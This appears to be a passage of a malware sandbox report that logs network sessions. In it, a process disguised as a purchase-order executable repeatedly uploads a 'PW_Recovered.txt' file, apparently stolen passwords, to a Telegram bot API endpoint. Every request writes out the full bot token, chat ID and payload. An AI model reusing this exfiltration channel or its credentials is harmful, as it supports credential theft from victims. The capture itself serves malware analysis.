                                                                                                                                            2024-12-16 13:16:13 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 37 37 62 30 37 39 33 39 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd3477b07939abContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:14 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:14 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:14 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17239,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354974,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            40192.168.2.449953149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:15 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd354553ed73c8
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:15 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 34 35 35 33 65 64 37 33 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd354553ed73c8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:16 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:16 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:16 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17243,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354976,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            41192.168.2.449959149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:17 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd365c0748ebc1
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:16:17 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 35 63 30 37 34 38 65 62 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd365c0748ebc1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:18 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:18 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:18 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 37 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17245,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354978,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            42192.168.2.449962149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:19 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd92e3d7cfdf0f
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:19 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 39 32 65 33 64 37 63 66 64 66 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd92e3d7cfdf0fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:20 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:20 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:20 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17247,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354980,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            43192.168.2.449968149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:16:21 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8de0a0b8afb2742
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:16:21 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 65 30 61 30 62 38 61 66 62 32 37 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8de0a0b8afb2742Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:16:22 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:16:22 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:16:22 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17249,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354982,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            44192.168.2.450136149.154.167.2204437340C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:18:14 UTC369OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8fa8d1df6635287
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-16 13:18:14 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 66 61 38 64 31 64 66 36 36 33 35 32 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8fa8d1df6635287Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:18:15 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:18:14 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:18:15 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 30 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":17255,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734355094,"document"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            45192.168.2.450137149.154.167.220443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-16 13:18:16 UTC345OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd1daa2fe4a239
                                                                                                                                            Host: api.telegram.org
                                                                                                                                            Content-Length: 581
                                                                                                                                            2024-12-16 13:18:16 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 61 61 32 66 65 34 61 32 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d
                                                                                                                                            Data Ascii: --------------------------8dd1daa2fe4a239Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
                                                                                                                                            2024-12-16 13:18:17 UTC388INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                            Date: Mon, 16 Dec 2024 13:18:16 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 528
                                                                                                                                            Connection: close
                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                            2024-12-16 13:18:17 UTC528INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 30 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22
